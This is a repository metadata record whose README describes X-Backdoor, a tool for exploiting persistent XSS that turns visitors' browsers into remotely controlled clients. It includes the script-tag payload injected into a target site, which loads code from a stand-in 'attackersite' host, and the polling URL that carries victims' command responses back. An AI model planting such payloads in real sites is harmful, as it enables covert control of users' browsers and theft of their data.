{"id":18035814,"url":"https://github.com/echo-devim/xbackdoor","last_synced_at":"2025-03-27T08:30:35.407Z","repository":{"id":82335473,"uuid":"43681312","full_name":"echo-devim/xbackdoor","owner":"echo-devim","description":"A tool for the persistent XSS exploitation with a focus for mobile web browsers","archived":true,"fork":false,"pushed_at":"2021-05-08T07:50:51.000Z","size":89,"stargazers_count":54,"open_issues_count":1,"forks_count":14,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-02-16T18:17:57.603Z","etag":null,"topics":["android","backdoor","mobile","php","remote-control","security","xss"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/echo-devim.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2015-10-05T11:51:54.000Z","updated_at":"2024-08-12T19:19:33.000Z","dependencies_parsed_at":null,"dependency_job_id":"9a54869e-97c7-4bd9-8a3d-94bc1525d82d","html_url":"https://github.com/echo-devim/xbackdoor","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2Fxbackdoor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2Fxbackdoor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2Fxbackdoor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/echo-devim%2Fxbackdoor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/echo-devim","download_url":"https://codeload.github.com/echo-devim/xbackdoor/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245809566,"owners_count":20676010,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android","backdoor","mobile","php","remote-control","security","xss"],"created_at":"2024-10-30T12:10:21.399Z","updated_at":"2025-03-27T08:30:35.397Z","avatar_url":"https://github.com/echo-devim.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# X-Backdoor I\n\nX-Backdoor is a tool to take advantage of a persistent XSS vulnerability. The idea is to play and explore the modern browsers capabilities and the impact that these can have when someone can control the clients.\n\n### Version\n1.0\n\n### Screenshots\n![screen1](https://raw.githubusercontent.com/BlackEmpire/xbackdoor/master/screenshots/screen1.png \"Screen 1\")\n![screen2](https://raw.githubusercontent.com/BlackEmpire/xbackdoor/master/screenshots/screen2.png \"Screen 2\")\n\n### Description\nWe have a target site and an attacker site. In the attacker site there are all the files of the project:\n* db.php - Contains the database configuration\n* getjs.php - Send js code to the client\n* acp/ - contain all the files to admin the backdoor\n\nNow, the attacker inject (with a persistent XSS) this piece of code in the target site:\n```html\n\u003cscript id=\"scr72\" src=\"http://attackersite/getjs.php\"\u003e\u003c/script\u003e\n```\nSo when a client visit the target site its browser will fetch the content from getjs.php. The javascript code sent from getjs.php, force the browser to make a new request every X seconds, where X is in your configuration. Meanwhile the attacker can view the victim clients, send to them javascript functions and get the response. When a client request the code from getjs.php, the php script checks if there is some js function to execute. If there is, it'll be sent to the client. The next time the client perform a request to the attacker site (looking for new commands) it'll send also the response of the previous function/command.\n\n#### Reload mechanism\nIn the javascript code sent from the attacker site there is a function that re-create a new script object in the DOM and this force the browser to make a new request. Every time the new script object has two get parameters. The first is the user id (uid) and the second is the data as response from a previous command. So it looks like this:\n```html\n\u003cscript id=\"scr72\" src=\"http://attackersite/getjs.php?r=2366\u0026uid=7278\u0026data=somereply\"\u003e\u003c/script\u003e\n```\nThe parameter r is a random number to avoid the caching (the requested url are always different).By default the response sent with the parameter data is encoded, while the javascript code sent from the php script is in clear text.\n\n### User ID\nWhen a client visit the infected page on the target site for the first time, a random number (his uid) will be generated and he'll send a special message to the attacker php script.\nThe uid will be saved into localStorage and in a cookie, so the browser will remember its uid. The attacker have to send a code to delete the cookie and clear the localStorage to have a new registration by the same user.\n\n#### Database\nThe database has three tables: `functions`, `users`, `schedules`.\\\nThe table `users` contains all information about the clients retrieved by php (server side).\\\nThe table `functions` contains a list of javascript functions.\\\nThe table `schedules` points one ore more functions that a certain client have to execute and saves the response.\n\nThe database schema is in db_dump.sql, you can manually execute the queries or import the file with phpMyAdmin. In the database there are already some functions. See *funclib.md* to get more functions.\n### Configuration\nEdit the following files:\n* acp/login.php - Edit the default login password\n* db.php - Insert your database configuration\n* getjs.php - Set some parameters\n\n### Development\n\nEveryone can join the project and submit his patches :)\n\n\nLicense\n----\n\nGNU General Public License v3 (GPL-3)\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fecho-devim%2Fxbackdoor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fecho-devim%2Fxbackdoor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fecho-devim%2Fxbackdoor/lists"}